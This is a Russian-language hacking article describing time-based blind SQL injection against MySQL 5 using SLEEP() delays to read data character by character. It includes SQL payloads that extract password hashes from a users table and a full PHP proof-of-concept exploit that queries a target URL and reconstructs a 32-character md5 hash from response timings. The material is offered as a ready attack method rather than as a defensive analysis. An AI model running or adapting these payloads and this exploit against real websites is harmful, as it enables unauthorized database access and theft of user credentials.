Использование sleep() вместо benchmark() в sql-инъекциях

Зачастую встречаются sql-инъекции, в которых нет ни вывода полей, ни вывода ошибок.
В таких случаях применяют find_in_set() и ей подобные.
Я предлагаю ввести новую альтернативу для пятой ветки mysql – sleep().

Рассмотрим следующий запрос:

SELECT SLEEP((SELECT substring(version(),1,1)))

Здесь будет задержка 5 секунд (работаем с пятой веткой) + уйдёт время на выполнение самого запроса.
Если сначала посмотреть, сколько уходит времени на получение ответа от сервера на запрос без задержки, можно точно узнать первый символ одним запросом.
А учитывая то, что обычно сервер выполняет запрос меньше, чем за одну секунду, можно брать просто целую часть от времени ответа сервера.

Теперь посмотрим, как вытаскивать символы. Предлагаю делать это с помощью ASCII-кодов:

SELECT SLEEP((SELECT ascii(substring((SELECT password FROM users LIMIT 1,1),1,1)))/50)

В данном запросе задержка будет равна одной пятидесятой от кода символа в секундах.
В зависимости от того, как быстро сервер возвращает ответы без задержки, можно варьировать это число во избежание ошибки.

Таким образом, на 1 md5() хеш потребуется ровно столько запросов, сколько в нём символов – 32.

Теперь о плюсах и минусах:

+ Рекордные 32 запроса на md5()
+ Не требует вывода ошибок
- Работает лишь начиная с MySQL 5
- Возможны погрешности, если сервер перегружен

Надо отметить, что минусы не так существены, как плюсы – старые ветки MySQL уже отмирают, а погрешностей можно избежать, меняя знаменатель в функции SLEEP().

Но главный минус -- это то, что эксплойт работает долго (чем больше множитель, тем дольше).

PoC-эксплойт (Pastebin):
<?php $url = "http://site.ru/news.php?id=1"; //URL запроса до "+AND+..." $id = 0; //Номер пользователя $coef = 2; //Множитель $try = 5; //Кол-во проверочных запросов function avrg($arr) { foreach ($arr as $val) { $sum+=$val; } return $sum/count($arr); } function delta($url) { $tests = array(); for($i=0;$i<=$try;$i++) { $time = time()+microtime(); file_get_contents("$url+and+sleep(1)"); $tests[$i] = time()+microtime()-$time; } return avrg($tests); } function testtime($url) { $time = time()+microtime(); file_get_contents($url); return time()+microtime()-$time; } $delta = round($coef*delta($url)); $testtime=testtime($url); echo "<b>Blind SQL-Injection pattern PoC-exploit by Root-access</b><br>"; echo "Request type: $url+and+sleep(substring(version(),1,1))<br>"; echo "Test time: $testtime<br>"; $sym = array('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'); $res = ""; for($i=1;$i<33;$i++) { $time = time()+microtime(); file_get_contents("$url+and+sleep($delta*(instr(0x30313233343536373839616263646566,substring((select+password+from+test+limit+$id,1),$i,1))))"); $res = $res.$sym[round((time()+microtime()-$time-$testtime)/2-1)]; } echo "Hash: ".$res; ?>